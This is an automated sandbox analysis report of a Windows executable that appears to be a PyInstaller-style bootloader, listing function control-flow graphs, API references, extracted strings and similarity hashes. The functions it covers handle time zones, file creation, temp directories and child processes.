                                                                                                                        control_flow_graph 135 7ff7a6754e20-7ff7a6754e5b call 7ff7a67547a8 call 7ff7a67547b0 call 7ff7a6754818 142 7ff7a6755085-7ff7a67550d1 call 7ff7a6749dd0 call 7ff7a67547a8 call 7ff7a67547b0 call 7ff7a6754818 135->142 143 7ff7a6754e61-7ff7a6754e6c call 7ff7a67547b8 135->143 170 7ff7a67550d7-7ff7a67550e2 call 7ff7a67547b8 142->170 171 7ff7a675520f-7ff7a675527d call 7ff7a6749dd0 call 7ff7a67506b8 142->171 143->142 148 7ff7a6754e72-7ff7a6754e7c 143->148 151 7ff7a6754e9e-7ff7a6754ea2 148->151 152 7ff7a6754e7e-7ff7a6754e81 148->152 153 7ff7a6754ea5-7ff7a6754ead 151->153 155 7ff7a6754e84-7ff7a6754e8f 152->155 153->153 156 7ff7a6754eaf-7ff7a6754ec2 call 7ff7a674cacc 153->156 158 7ff7a6754e9a-7ff7a6754e9c 155->158 159 7ff7a6754e91-7ff7a6754e98 155->159 165 7ff7a6754eda-7ff7a6754ee6 call 7ff7a6749e18 156->165 166 7ff7a6754ec4-7ff7a6754ec6 call 7ff7a6749e18 156->166 158->151 162 7ff7a6754ecb-7ff7a6754ed9 158->162 159->155 159->158 177 7ff7a6754eed-7ff7a6754ef5 165->177 166->162 170->171 178 7ff7a67550e8-7ff7a67550f3 call 7ff7a67547e8 170->178 188 7ff7a675528b-7ff7a675528e 171->188 189 7ff7a675527f-7ff7a6755286 171->189 177->177 180 7ff7a6754ef7-7ff7a6754f08 call 7ff7a674f924 177->180 178->171 187 7ff7a67550f9-7ff7a675511c call 7ff7a6749e18 GetTimeZoneInformation 178->187 180->142 190 7ff7a6754f0e-7ff7a6754f64 call 7ff7a673c210 * 4 call 7ff7a6754d3c 180->190 206 7ff7a67551e4-7ff7a675520e call 7ff7a67547a0 call 7ff7a6754790 call 7ff7a6754798 187->206 207 7ff7a6755122-7ff7a6755143 187->207 194 7ff7a67552c5-7ff7a67552d8 call 7ff7a674cacc 188->194 195 7ff7a6755290 188->195 192 7ff7a675531b-7ff7a675531e 189->192 248 7ff7a6754f66-7ff7a6754f6a 190->248 196 7ff7a6755293 192->196 199 7ff7a6755324-7ff7a675532c call 7ff7a6754e20 192->199 210 7ff7a67552da 194->210 211 7ff7a67552e3-7ff7a67552fe call 7ff7a67506b8 194->211 195->196 203 7ff7a6755298-7ff7a67552c4 call 7ff7a6749e18 call 7ff7a673ad80 196->203 204 7ff7a6755293 call 7ff7a675509c 196->204 199->203 204->203 212 7ff7a675514e-7ff7a6755155 207->212 213 7ff7a6755145-7ff7a675514b 207->213 217 7ff7a67552dc-7ff7a67552e1 call 7ff7a6749e18 210->217 234 7ff7a6755305-7ff7a6755317 call 7ff7a6749e18 211->234 235 7ff7a6755300-7ff7a6755303 211->235 218 7ff7a6755157-7ff7a675515f 212->218 219 7ff7a6755169 212->219 213->212 217->195 218->219 226 7ff7a6755161-7ff7a6755167 218->226 224 7ff7a675516b-7ff7a67551df call 7ff7a673c210 * 4 call 7ff7a6751c7c call 7ff7a6755334 * 2 219->224 224->206 226->224 234->192 235->217 250 7ff7a6754f6c 248->250 251 7ff7a6754f70-7ff7a6754f74 248->251 250->251 251->248 253 7ff7a6754f76-7ff7a6754f9b call 7ff7a6757c64 251->253 259 7ff7a6754f9e-7ff7a6754fa2 253->259 261 7ff7a6754fa4-7ff7a6754faf 259->261 262 7ff7a6754fb1-7ff7a6754fb5 259->262 261->262 263 7ff7a6754fb7-7ff7a6754fbb 261->263 262->259 265 7ff7a675503c-7ff7a6755040 263->265 266 7ff7a6754fbd-7ff7a6754fe5 call 7ff7a6757c64 263->266 268 7ff7a6755047-7ff7a6755054 265->268 269 7ff7a6755042-7ff7a6755044 265->269 275 7ff7a6754fe7 266->275 276 7ff7a6755003-7ff7a6755007 266->276 271 7ff7a6755056-7ff7a675506c call 7ff7a6754d3c 268->271 272 7ff7a675506f-7ff7a675507e call 7ff7a67547a0 call 7ff7a6754790 268->272 269->268 271->272 272->142 279 7ff7a6754fea-7ff7a6754ff1 275->279 276->265 281 7ff7a6755009-7ff7a6755027 call 7ff7a6757c64 276->281 279->276 282 7ff7a6754ff3-7ff7a6755001 279->282 287 7ff7a6755033-7ff7a675503a 281->287 282->276 282->279 287->265 288 7ff7a6755029-7ff7a675502d 287->288 288->265 289 7ff7a675502f 288->289 289->287
                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A6754E65
                                                                                                                          • Part of subcall function 00007FF7A67547B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67547CC
                                                                                                                          • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                          • Part of subcall function 00007FF7A6749DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7A6749DAF,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A6749DD9
                                                                                                                          • Part of subcall function 00007FF7A6749DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7A6749DAF,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A6749DFE
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A6754E54
                                                                                                                          • Part of subcall function 00007FF7A6754818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A675482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550CA
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550DB
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550EC
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7A675532C), ref: 00007FF7A6755113
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                        • Opcode ID: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                                                                                        • Instruction ID: 991424b52c8d9526e416483fb6d91dae79b80cf4206dfe0673a99327ff2d9423
                                                                                                                        • Opcode Fuzzy Hash: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                                                                                        • Instruction Fuzzy Hash: 4ED1C426A2A25286E720FF25DD601BAA751FF4CF84FC64136DA0D476E9DF3CE4418760
                                                                                                                        Function 00007FF7A6755D6C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 320 7ff7a6755d6c-7ff7a6755ddf call 7ff7a6755aa0 323 7ff7a6755df9-7ff7a6755e03 call 7ff7a6746cfc 320->323 324 7ff7a6755de1-7ff7a6755dea call 7ff7a6744424 320->324 330 7ff7a6755e1e-7ff7a6755e87 CreateFileW 323->330 331 7ff7a6755e05-7ff7a6755e1c call 7ff7a6744424 call 7ff7a6744444 323->331 329 7ff7a6755ded-7ff7a6755df4 call 7ff7a6744444 324->329 344 7ff7a675613a-7ff7a675615a 329->344 334 7ff7a6755e89-7ff7a6755e8f 330->334 335 7ff7a6755f04-7ff7a6755f0f GetFileType 330->335 331->329 340 7ff7a6755ed1-7ff7a6755eff GetLastError call 7ff7a67443b8 334->340 341 7ff7a6755e91-7ff7a6755e95 334->341 337 7ff7a6755f11-7ff7a6755f4c GetLastError call 7ff7a67443b8 CloseHandle 335->337 338 7ff7a6755f62-7ff7a6755f69 335->338 337->329 355 7ff7a6755f52-7ff7a6755f5d call 7ff7a6744444 337->355 347 7ff7a6755f6b-7ff7a6755f6f 338->347 348 7ff7a6755f71-7ff7a6755f74 338->348 340->329 341->340 342 7ff7a6755e97-7ff7a6755ecf CreateFileW 341->342 342->335 342->340 352 7ff7a6755f7a-7ff7a6755fcf call 7ff7a6746c14 347->352 348->352 353 7ff7a6755f76 348->353 358 7ff7a6755fee-7ff7a675601f call 7ff7a6755820 352->358 359 7ff7a6755fd1-7ff7a6755fdd call 7ff7a6755ca8 352->359 353->352 355->329 366 7ff7a6756025-7ff7a6756067 358->366 367 7ff7a6756021-7ff7a6756023 358->367 359->358 365 7ff7a6755fdf 359->365 368 7ff7a6755fe1-7ff7a6755fe9 call 7ff7a6749f90 365->368 369 7ff7a6756089-7ff7a6756094 366->369 370 7ff7a6756069-7ff7a675606d 366->370 367->368 368->344 371 7ff7a6756138 369->371 372 7ff7a675609a-7ff7a675609e 369->372 370->369 374 7ff7a675606f-7ff7a6756084 370->374 371->344 372->371 375 7ff7a67560a4-7ff7a67560e9 CloseHandle CreateFileW 372->375 374->369 377 7ff7a67560eb-7ff7a6756119 GetLastError call 7ff7a67443b8 call 7ff7a6746e3c 375->377 378 7ff7a675611e-7ff7a6756133 375->378 377->378 378->371
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617910340-0
                                                                                                                        • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                        • Instruction ID: 6dd26cdb7e460e011835fe7c626f5df598fff4f6454f1272e5b929b9974c18bc
                                                                                                                        • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                        • Instruction Fuzzy Hash: 3DC1B032B35A4185EB10EF69C8A46AE7761FB48F98B820239DB1E577E9CF39D051C310
                                                                                                                        Function 00007FF7A6736780 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(?,00000000,?,00007FF7A673674D), ref: 00007FF7A673681A
                                                                                                                          • Part of subcall function 00007FF7A6736990: GetEnvironmentVariableW.KERNEL32(00007FF7A67336E7), ref: 00007FF7A67369CA
                                                                                                                          • Part of subcall function 00007FF7A6736990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7A67369E7
                                                                                                                          • Part of subcall function 00007FF7A67466B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67466CD
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7A67368D1
                                                                                                                          • Part of subcall function 00007FF7A6732770: MessageBoxW.USER32 ref: 00007FF7A6732841
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                        • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                        • API String ID: 3752271684-1116378104
                                                                                                                        • Opcode ID: e6afb0128859ccbf49ce8011b8d869e8e025b7611e3f9a50b4fcc1994f3a2000
                                                                                                                        • Instruction ID: 8db842b1c21dd6ee7dbbad3b4c2ae3f363a61c2737988c3768ff32986c2f6954
                                                                                                                        • Opcode Fuzzy Hash: e6afb0128859ccbf49ce8011b8d869e8e025b7611e3f9a50b4fcc1994f3a2000
                                                                                                                        • Instruction Fuzzy Hash: 84516C11B3E65240FA59BB629D396BBD2919F5EFC0FC64075DD0E477BAEE2CE4018220
                                                                                                                        Function 00007FF7A675509C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 799 7ff7a675509c-7ff7a67550d1 call 7ff7a67547a8 call 7ff7a67547b0 call 7ff7a6754818 806 7ff7a67550d7-7ff7a67550e2 call 7ff7a67547b8 799->806 807 7ff7a675520f-7ff7a675527d call 7ff7a6749dd0 call 7ff7a67506b8 799->807 806->807 812 7ff7a67550e8-7ff7a67550f3 call 7ff7a67547e8 806->812 819 7ff7a675528b-7ff7a675528e 807->819 820 7ff7a675527f-7ff7a6755286 807->820 812->807 818 7ff7a67550f9-7ff7a675511c call 7ff7a6749e18 GetTimeZoneInformation 812->818 833 7ff7a67551e4-7ff7a675520e call 7ff7a67547a0 call 7ff7a6754790 call 7ff7a6754798 818->833 834 7ff7a6755122-7ff7a6755143 818->834 823 7ff7a67552c5-7ff7a67552d8 call 7ff7a674cacc 819->823 824 7ff7a6755290 819->824 822 7ff7a675531b-7ff7a675531e 820->822 825 7ff7a6755293 822->825 828 7ff7a6755324-7ff7a675532c call 7ff7a6754e20 822->828 836 7ff7a67552da 823->836 837 7ff7a67552e3-7ff7a67552fe call 7ff7a67506b8 823->837 824->825 830 7ff7a6755298-7ff7a67552c4 call 7ff7a6749e18 call 7ff7a673ad80 825->830 831 7ff7a6755293 call 7ff7a675509c 825->831 828->830 831->830 838 7ff7a675514e-7ff7a6755155 834->838 839 7ff7a6755145-7ff7a675514b 834->839 842 7ff7a67552dc-7ff7a67552e1 call 7ff7a6749e18 836->842 857 7ff7a6755305-7ff7a6755317 call 7ff7a6749e18 837->857 858 7ff7a6755300-7ff7a6755303 837->858 843 7ff7a6755157-7ff7a675515f 838->843 844 7ff7a6755169 838->844 839->838 842->824 843->844 850 7ff7a6755161-7ff7a6755167 843->850 848 7ff7a675516b-7ff7a67551df call 7ff7a673c210 * 4 call 7ff7a6751c7c call 7ff7a6755334 * 2 844->848 848->833 850->848 857->822 858->842
                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550CA
                                                                                                                          • Part of subcall function 00007FF7A6754818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A675482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550DB
                                                                                                                          • Part of subcall function 00007FF7A67547B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67547CC
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550EC
                                                                                                                          • Part of subcall function 00007FF7A67547E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67547FC
                                                                                                                          • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7A675532C), ref: 00007FF7A6755113
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                        • Opcode ID: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                                                                                        • Instruction ID: 5d05dc0d9c9e8aaef8a22c6994ec370e9cdea994302ff1c6e904aee9308ce24c
                                                                                                                        • Opcode Fuzzy Hash: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                                                                                        • Instruction Fuzzy Hash: DE517232A2A64286E710FF31DDA11AAA760FB4CB84FC24135DA0D436B9DF3CE4018B60
                                                                                                                        Function 00007FF7A67317B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                        • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                        • API String ID: 2153230061-4158440160
                                                                                                                        • Opcode ID: 9107ab47c13acb47a45ab342f5a73b489a7db59ea1c1e3128dc2121c9b53a65e
                                                                                                                        • Instruction ID: 64fd012bc83e4d10c218bf0bacc92c6026c7e40b738ac7c3d49c78bbae6af8dd
                                                                                                                        • Opcode Fuzzy Hash: 9107ab47c13acb47a45ab342f5a73b489a7db59ea1c1e3128dc2121c9b53a65e
                                                                                                                        • Instruction Fuzzy Hash: 79516371A2BA4686EB58EF24D86017AB3A0EF4CF54B928135DA1D833A9DF7CE440C750
                                                                                                                        Function 00007FF7A6731440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 53 7ff7a6731440-7ff7a6731457 call 7ff7a6736720 56 7ff7a6731459-7ff7a6731461 53->56 57 7ff7a6731462-7ff7a6731485 call 7ff7a6736a40 53->57 60 7ff7a67314a7-7ff7a67314ad 57->60 61 7ff7a6731487-7ff7a67314a2 call 7ff7a67324d0 57->61 63 7ff7a67314af-7ff7a67314ba call 7ff7a6733cb0 60->63 64 7ff7a67314e0-7ff7a67314f4 call 7ff7a673f934 60->64 69 7ff7a6731635-7ff7a6731647 61->69 70 7ff7a67314bf-7ff7a67314c5 63->70 71 7ff7a6731516-7ff7a673151a 64->71 72 7ff7a67314f6-7ff7a6731511 call 7ff7a67324d0 64->72 70->64 73 7ff7a67314c7-7ff7a67314db call 7ff7a6732770 70->73 75 7ff7a673151c-7ff7a6731528 call 7ff7a6731050 71->75 76 7ff7a6731534-7ff7a6731554 call 7ff7a67440b0 71->76 82 7ff7a6731617-7ff7a673161d 72->82 73->82 83 7ff7a673152d-7ff7a673152f 75->83 87 7ff7a6731575-7ff7a673157b 76->87 88 7ff7a6731556-7ff7a6731570 call 7ff7a67324d0 76->88 85 7ff7a673162b-7ff7a673162e call 7ff7a673f2ac 82->85 86 7ff7a673161f call 7ff7a673f2ac 82->86 83->82 98 7ff7a6731633 85->98 97 7ff7a6731624 86->97 89 7ff7a6731581-7ff7a6731586 87->89 90 7ff7a6731605-7ff7a6731608 call 7ff7a674409c 87->90 99 7ff7a673160d-7ff7a6731612 88->99 96 7ff7a6731590-7ff7a67315b2 call 7ff7a673f5fc 89->96 90->99 102 7ff7a67315e5-7ff7a67315ec 96->102 103 7ff7a67315b4-7ff7a67315cc call 7ff7a673fd3c 96->103 97->85 98->69 99->82 105 7ff7a67315f3-7ff7a67315fb call 7ff7a67324d0 102->105 108 7ff7a67315ce-7ff7a67315d1 103->108 109 7ff7a67315d5-7ff7a67315e3 103->109 111 7ff7a6731600 105->111 108->96 112 7ff7a67315d3 108->112 109->105 111->90 112->111
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                        • API String ID: 0-666925554
                                                                                                                        • Opcode ID: 180429b29ca1d9603c5cd193ccde240ee27283c29bb2ee97ca1237b7c6a23428
                                                                                                                        • Instruction ID: 101eaaf35552458a50f5d04ef593e7b20f06fbb4134ecdbf786d0cb2cafa1c48
                                                                                                                        • Opcode Fuzzy Hash: 180429b29ca1d9603c5cd193ccde240ee27283c29bb2ee97ca1237b7c6a23428
                                                                                                                        • Instruction Fuzzy Hash: 5451AE61B2A64281EA18BB519C246BBA390EF49FD4FC64431DE1D477B6EE3CE5458320
                                                                                                                        Function 00007FF7A67378A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                        • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                        • API String ID: 4998090-2855260032
                                                                                                                        • Opcode ID: bd17a40a22c884ade7d87aa0fec574675d56acca5ecee7ff6bf5a056ddc52e71
                                                                                                                        • Instruction ID: c42e09655af6c89c6abecfd9949a9ec1bd181b215644f0ce1fbc4eeb96f2839d
                                                                                                                        • Opcode Fuzzy Hash: bd17a40a22c884ade7d87aa0fec574675d56acca5ecee7ff6bf5a056ddc52e71
                                                                                                                        • Instruction Fuzzy Hash: E741633163D68282E750AF60EC646ABB361FB88B94F850231EA5E476F9DF3CD444C710
                                                                                                                        Function 00007FF7A6736FD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                        • String ID: CreateProcessW$Error creating child process!
                                                                                                                        • API String ID: 2895956056-3524285272
                                                                                                                        • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
